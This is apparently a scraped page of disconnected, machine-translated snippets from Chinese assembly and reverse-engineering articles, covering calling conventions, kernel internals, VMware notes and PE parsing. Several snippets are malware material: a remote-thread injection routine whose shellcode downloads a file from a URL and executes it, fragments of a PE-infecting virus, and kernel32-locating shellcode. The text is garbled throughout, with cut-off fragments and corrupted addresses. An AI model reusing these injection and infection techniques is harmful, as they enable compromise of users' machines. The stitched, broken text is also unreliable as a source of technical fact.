gsx edi

-level page tableMoV FS: [eax + ECx], EDX; modify the ing of our code in the physical memoryMoV dword ptr fs: [eax], 103 h; Modify physical page 0 (that is, bios/DOS zone ing to 80000000 H). Endif; Note: winnt does not use bios/DOS pages, that is, physical pages 0); ######################################## ######################################## ###################Call memscansapiaddr. If EDI; ### find the API function address in the memory, eax-> zw

talk about some personal opinions. Next, we will conduct some small tests and explain them in assembly language. You can do it together. (1) char name [] and char * name 1: 2: void process () 3 :{ 00401020 push ebp 00401021 mov ebp, esp 00401023 sub esp, 4Ch 00401026 push ebx 00401027 push esi 00401028 push edi 00401029 lea edi, [ebp-4Ch] 0040102C mov ecx, 13 h 00401031 mov eax, 0 CCCCCCCCh 00401036 re

CPU:AMD Athon xp2000+ MEM:768MB ' Hard drive: 80G Os:winxp+sp1 VMWare GSX Server 3.0 Windows 2003 Enterprise edition+exchange2003 Enterprise Edition With VMware GSX Server, three Win2003 systems are allocated, each system allocates 192MB of memory, and memory is set to 576MB in the "HOST" of VMware GSX server. When installing three Win2003, I first add a network

Loading and execution of programs (iii)--reading notes 23And then the last time the content said.load_relocate_programthe explanation of the process is not over yet, so create a stack segment descriptor and reposition symbol table.Allocating stack space and creating a stack segment descriptor462 ; Creating a program stack segment descriptor463 movecx,[edi+0x0c]; 4KB magnification464 movEbx0x000fffff465 SubEbx,ecxTo get

__stdcall __cdecl __fastcall vc6.0:int __stdcall/__cdecl/__fastcall Add (int x, int y){return x+y;}void Main (){Add (2,3);}1.__stdcall:1:int __stdcall Add (int x, int y)2: {00401020 Push EBP00401021 mov Ebp,esp00401023 Sub esp,40h00401026 push EBX00401027 push ESI00401028 Push EDI00401029 Lea edi,[ebp-40h]0040102C mov ecx,10h00401031 mov eax,0cccccccch00401036 Rep stos dword ptr [edi]3:return X

, hWnd, hModule, ShellSize, addr WrittenInvoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTidInvoke ExitProcess, 0End start In fact, this section: Shellcode procPush 00403008 HCall LoadLibraryPush 00403013 HCall LoadLibraryInvoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULLInvoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOWInvoke ExitThread, 0RetShellcode endp You can convert it into a machine code, so that you do not need a subroutine. Directly

there are also functions prefixed with KE and Ki in the reactos kernel. The prefix ke indicates that it belongs to the "kernel" module. Note that the so-called "kernel" module in Windows is only part of the kernel, rather than the entire kernel. I will discuss this in "talking about wine" later. The prefix Ki refers to the functions related to interrupt response and processing in the kernel. Kisystemservice () is an assembly program which serves as system_call () in the Linux kernel. This Code

frame on the stack.* The following are already on the stack.*/// SS + 0x0// ESP + 0x4// Eflags + 0x8// Cs + 0xc// EIP + 0x10Pushl $0 // + 0x14Pushl % EBP // + 0x18Pushl % EBX // + 0x1cPushl % ESI // + 0x20Pushl % EDI // + 0x24Pushl % FS // + 0x28 /* Load PCR selector into FS */Movw $ pcr_selector, % BXMovw % BX, % FS /* Save the previous exception list */Pushl % FS: kpcr_exception_list // + 0x2c /* Set the exception handler chain Terminator */Movl $0

still no effect. I am very disappointed to read articles on the Internet to play. Inadvertently saw an article of Lao Luo, where he wrote a special note grateful to a person who helped him in the technology, pointed out that XXX should clear 0. It seems that he has encountered this problem, I add his code to my program, the miracle found that can be normal infection. I later looked up a lot of information and didn't find out what the structure was, only that it was the 11th member of the Image_

, [edx + esi]; mov esi, [esi + 0x78]; Lea ESI, [edx + esi]; mov edi, [esi + 0x1c]; Lea EDI, [edx + edi]; MOV[EBP-0X04], EDI; mov edi, [esi + 0x20];

closehandle, hfilePop eax. ElseMoV eax, offset g_szfileopenerror. EndifRETGetpefilesize endp Ispefilemap proc pmapping: DWORDIf d_useseh EQ 1Local seh: sehEndif; d_useseh MoV g_dwvalidpe, falseMoV EDI, pmapping If d_useseh EQ 1Assume FS: NothingPush FS: [0]Pop Seh. prevlinkMoV Seh. currenthandler, offset sehhandlerMoV Seh. safeoffset, offset finalexitLea eax, sehMoV FS: [0], eaxMoV Seh. prevesp, ESPMoV Seh. prevebp, EBPEndif; d_useseh Assume

OnlySetInfectedMark 　　 ; Read all virus block tables Mov eax, ebp; read function number Call edi; read the block table to esi (@ 9) 　　 The following is a complete modification to handle the Winzip self-extracting file error. when you open the self-extracting file, The virus will not be infected. First, the virus obtains the ToRawData pointer of the 2nd block tables, Read the data and determine whether the data contains the "WinZip (R )" 　　 Xchg eax,

Here the "string" is not a single string, including all consecutive data (such as arrays); the string command is only used for memory operations. Move string commands: movsb, movsw, and movsd; from ESI-> EDI; after execution, the ESI and EDI address move the corresponding unit comparison string commands: cmpsb, cmpsw, cmpsd; compare ESI and EDI. After exe

functions during memory construction and analysis? Copy to clipboardprint? 74: manager m; 00401268 lea ecx, [ebp-4] 0040126B call @ ILT + 60 (manager: manager) (00401041) 75 :} 00401270 lea ecx, [ebp-4] 00401273 call @ ILT + 0 (manager ::~ Manager) (00401005) 00401278 pop edi 00401279 pop esi 004020.a pop ebx 004010000b add esp, 44 h 0040da-e cmp ebp, esp 00401280 call _ chkesp (00408760) 00401285 mov esp, ebp 00401287 pop ebp 74: manager m; 004012

Linux-0.11 Memory Management module is the source of the more difficult to understand the part, now the author's personal understanding publishedFirst hair Linux-0.11 kernel memory management get_free_page () function analysisHave time to write other functions or files:)/* *author:davidlin *date:2014-11-11pm *email: [email protected] or [email protected] *world:the City of SZ , in China *ver:000.000.001 *history:editor time do 1) Linpeng 2014-11-11 Created this file! 2) */Here is the source code

that shellcode will be much larger. At the summit because Flashsky Daniel refused to disclose source code, so had to do their own, ample clothing. This period of time due to review make-up (last semester accidentally hung 4 #_#), so dragged for so long. In fact, the code was written very early, is not bothered to write this document. This morning finally made up my mind to spend the morning to finish this document, it is inevitable that there are some mistakes, I hope you point out. Shellcode

(SAVE) 00400476 33DB xor ebx, ebx00400478 EB jmp short 00400 47e0040047a 83c0 add eax, 0x40040047d, Inc ebx0040047e 8B0C24 mov ECX, DWORD ptr [ESP]; ECX = = Kernel32_imageBase00400481 8B10 mov edx, DWORD ptr [EAX]; API offset00400483 03d1 add edx, ecx; edx = = API Addr00400485 8BFA mov edi, edx; Sava Api Addr00400487 33c9 xor ecx, ecx00400489 push EAX ; Kernel32_exprottable_addrofnames (Sa

This article explains the use of assembly language to find the maximum value of a set of numbers, mainly related to the knowledge points have data segments, loops and so on.# Purpose: Find the largest number in the program # # Variable: The purpose of the Register # %edi-Save the data item index being checked # %EBX-the largest item currently found # %EAX-Current Data # # Use the following memory location: # Data_ Items-Contain

Registry Keys get removed. you do not need a license in order to download the program or run the installer, As you are only uninstalling the program. If you are uninstalling something other than workstation 5.x, 6. X., or 7.x, run the VMware registry cleaner script. Note: The Cleaner script, vmware_install_cleaner.zip, is attached to this article. Run this script when you are logged on as a member of the local Administrators Group. the Registry cleaner utility removes all registry keys use

It's free. Let's take a look.ODLoad directly as follows: 00414000> $ E8 00000000 call 0041400500414005 $ 5B pop ebx // locate the code00414006.81EB05024000 sub ebx, 00400205 // The code segment length, followed by a variable0041400C. 64: 8B3D 30000000 mov edi, dword ptr fs: [30] // FS [30]-> PEB, locate kernel32.dll00414013. 8B7F 0C mov edi, dword ptr [edi + C] /